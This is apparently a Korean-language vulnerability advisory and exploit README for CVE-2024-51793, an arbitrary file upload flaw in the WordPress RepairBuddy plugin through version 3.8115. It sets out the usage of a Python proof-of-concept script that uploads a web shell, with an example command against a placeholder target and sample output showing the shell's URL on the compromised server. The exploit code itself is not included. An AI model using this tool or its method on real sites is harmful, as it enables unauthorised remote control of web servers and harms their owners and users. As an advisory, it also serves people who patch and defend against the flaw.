
워드프레스 RepairBuddy 플러그인 <= 3.8115 - 임의 파일 업로드 취약점
CVE-ID: CVE-2024-51793
게시일: 2024-11-11
업데이트: 2024-11-11
제목: WordPress RepairBuddy 플러그인 <= 3.8115 - 임의 파일 업로드 취약점
설명:
Webful Creations Computer Repair Shop의 위험한 유형 파일 무제한 업로드 취약점으로, 웹 서버에 웹 셸을 업로드할 수 있습니다. 이 문제는 Computer Repair Shop에 영향을 미칩니다: n/a부터 3.8115까지.
CWE:
CVSS:
이는 WordPress RepairBuddy 플러그인 버전 <= 3.8115의 임의 파일 업로드 취약점에 대한 개념 증명 익스플로잇입니다. 이 익스플로잇을 통해 공격자는 취약한 서버에 웹 셸을 업로드할 수 있습니다.
requests 라이브러리 (pip install requests)usage:
CVE-2024-51793.py [-h] -u URL [-shell SHELL]
WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-shell SHELL Shell code to upload
python
CVE-2024-51793.py -u http://target.com/wordpress
Exploit By : Nxploit Khaled Alenazi,
🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php
익스플로잇 제작: Nxploited, Khaled Alenazi